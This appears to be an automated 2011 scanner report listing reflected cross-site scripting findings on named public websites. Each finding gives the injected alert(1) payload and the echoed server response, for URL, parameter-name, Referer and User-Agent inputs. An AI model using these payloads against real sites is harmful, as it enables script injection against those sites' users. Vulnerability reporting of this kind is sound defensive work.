The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1d661<script>alert(1)</script>a9d3e1ed519 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 11:49:47 GMT Server: Apache/2.2.8 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html Content-Length: 293
<html><body><b>The page you requested:<br/><i>www.schoolfusion.us/server-status1d661<script>alert(1)</script>a9d3e1ed519</i><br/> does not exist on www.schoolfusion.us<br />Please click <a href='http: ...[SNIP]...
2.49. http://www.stltoday.com/server-status [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.stltoday.com
Path:
/server-status
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 287fc-->40f7fe6d0fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a29f"%3balert(1)//3200f220976 was submitted in the REST URL parameter 1. This input was echoed as 5a29f";alert(1)//3200f220976 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afe50"><script>alert(1)</script>a72918afc84 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1503"><script>alert(1)</script>dfa9e07acd6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8652a'-alert(1)-'6b8ddda77f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4043e'-alert(1)-'59bd963696c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.2.55. http://www.trails.com/server-status [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.trails.com
Path:
/server-status
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ccffb'-alert(1)-'ebdf6f8cd45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.2.56. http://www.travelpod.com/server-status [REST URL parameter 1]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.travelpod.com
Path:
/server-status
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 867ac"><script>alert(1)</script>9a40fad7fa4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.2.57. http://www.uscellular.com/server-status [REST URL parameter 1]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.uscellular.com
Path:
/server-status
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript rest-of-line comment. The payload 37f63</script><script>alert(1)</script>7bc3bb8d3e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html> <head>
<! ...[SNIP]... <SCRIPT type="text/javascript">
function go() { //alert("http://10.205.186.40/uscellular/common/USCC404ErrorPage.jsp?path=/server-status37f63</script><script>alert(1)</script>7bc3bb8d3e1"); var URL= "https://vcuscc.synovate.com/uscellularfeedback/?URL=" + escape("http://10.205.186.40/uscellular/common/USCC404ErrorPage.jsp?path=/server-status37f63</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6218b"%3balert(1)//9c7ae4c25c7 was submitted in the REST URL parameter 1. This input was echoed as 6218b";alert(1)//9c7ae4c25c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html> <head>
<! ...[SNIP]... server-status6218b";alert(1)//9c7ae4c25c7"); var URL= "https://vcuscc.synovate.com/uscellularfeedback/?URL=" + escape("http://10.205.186.40/uscellular/common/USCC404ErrorPage.jsp?path=/server-status6218b";alert(1)//9c7ae4c25c7") //alert(URL); window.open(URL,"",'width='+screen.width+',height='+screen.height+',toolbar=0,location=0,directories=0,status=0,menuBar=0,scrollBars=1,resizable=0');
} </SCRIPT> ...[SNIP]...
2.59. http://www.uscellular.com/server-status [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.uscellular.com
Path:
/server-status
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2130"-alert(1)-"e75eaee9692 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html> <head>
<! ...[SNIP]... er-status&b2130"-alert(1)-"e75eaee9692=1"); var URL= "https://vcuscc.synovate.com/uscellularfeedback/?URL=" + escape("http://10.205.186.40/uscellular/common/USCC404ErrorPage.jsp?path=/server-status&b2130"-alert(1)-"e75eaee9692=1") //alert(URL); window.open(URL,"",'width='+screen.width+',height='+screen.height+',toolbar=0,location=0,directories=0,status=0,menuBar=0,scrollBars=1,resizable=0');
} </SCRIPT> ...[SNIP]...
2.60. http://www.uscellular.com/server-status [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.uscellular.com
Path:
/server-status
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript rest-of-line comment. The payload fe658</script><script>alert(1)</script>d0b2b654cd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html> <head>
<! ...[SNIP]... <SCRIPT type="text/javascript">
function go() { //alert("http://10.205.186.40/uscellular/common/USCC404ErrorPage.jsp?path=/server-status&fe658</script><script>alert(1)</script>d0b2b654cd4=1"); var URL= "https://vcuscc.synovate.com/uscellularfeedback/?URL=" + escape("http://10.205.186.40/uscellular/common/USCC404ErrorPage.jsp?path=/server-status&fe658</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41715"><script>alert(1)</script>3fd18ffdef9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69d0c"><script>alert(1)</script>ee53c632335 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5bb61<img%20src%3da%20onerror%3dalert(1)>7a93292b75c was submitted in the REST URL parameter 1. This input was echoed as 5bb61<img src=a onerror=alert(1)>7a93292b75c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
<html> <head><title>URL Not Found</title></head> <body> <h1>URL Not Found</h1> <b>http://www.washington.edu/server-status5bb61<img src=a onerror=alert(1)>7a93292b75c</b> was not found or is no l ...[SNIP]... <br> Reason: File does not exist: /www/world/server-status5bb61<img src=a onerror=alert(1)>7a93292b75c.</br> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12b0e'%3bf60efb54809 was submitted in the REST URL parameter 1. This input was echoed as 12b0e';f60efb54809 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b57fd"%3b663579dee14 was submitted in the REST URL parameter 1. This input was echoed as b57fd";663579dee14 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 1 is copied into an HTML comment. The payload a46fa--><script>alert(1)</script>0e7a0f0b634 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7d885<script>alert(1)</script>591960a3e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cec56"><a>ec84848f36a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
2.69. http://www.wisc.edu/server-status [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.wisc.edu
Path:
/server-status
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 167b7<script>alert(1)</script>b2de78620af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 11:59:56 GMT Server: Apache X-Powered-By: PHP/5.1.6 Content-Type: text/html; charset=UTF-8 Content-Length: 19738
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http- ...[SNIP]... <strong>/server-status?167b7<script>alert(1)</script>b2de78620af=1</strong> ...[SNIP]...
2.70. http://www.wisc.edu/server-status [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.wisc.edu
Path:
/server-status
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload c4798--><script>alert(1)</script>6e746355b62 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 11:59:57 GMT Server: Apache X-Powered-By: PHP/5.1.6 Content-Type: text/html; charset=UTF-8 Content-Length: 19747
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http- ...[SNIP]... <!--(http://www.wisc.edu/server-status?c4798--><script>alert(1)</script>6e746355b62=1)--> ...[SNIP]...
2.71. http://www.wisc.edu/server-status [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.wisc.edu
Path:
/server-status
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68eb7"><a>84482eb936a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fb3b"><script>alert(1)</script>3f0642751f8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f521a"><a>d2276860312 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8da4"><script>alert(1)</script>eaff8ad27c6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 351ad<script>alert(1)</script>1156cf6eab3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d1b7"><script>alert(1)</script>8b8c2a2c524 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ea48"-alert(1)-"7097f65fc20 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f095"-alert(1)-"fb200d763f9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e8c2"><script>alert(1)</script>d850478623 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d861d"><a>dfba8ebd5bd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <me ...[SNIP]... //adlog.com.com/adlog/i/r=6455&sg=1815&o=10%253A&h=cn&p=&b=2&l=&site=2&pt=2000&nd=10&pid=&cid=0&pp=100&e=&rqid=01c13-ad-e5:4D97098A3A6B2&orh=d861d"><a>dfba8ebd5bd&ort=&oepartner=&epartner=&ppartner=&pdom=d861d"> ...[SNIP]...
2.81. http://www.townhall.com/server-status [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.townhall.com
Path:
/server-status
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4506f"><script>alert(1)</script>653e01c4ef5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
<html><body>The requested resource was moved. It could be found here: <a href="http://townhall.com/server-status?4506f"><script>alert(1)</script>653e01c4ef5=1">http://townhall.com/server-status?4506f" ...[SNIP]...
2.82. http://www.townhall.com/server-status [name of an arbitrarily supplied request parameter]previous
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.townhall.com
Path:
/server-status
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 98322<script>alert(1)</script>4f731bc80bc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
<html><body>The requested resource was moved. It could be found here: <a href="http://townhall.com/server-status?98322<script>alert(1)</script>4f731bc80bc=1">http://townhall.com/server-status?98322<script>alert(1)</script>4f731bc80bc=1</a> ...[SNIP]...
Report generated by XSS.CX at Sat Apr 02 07:42:05 CDT 2011.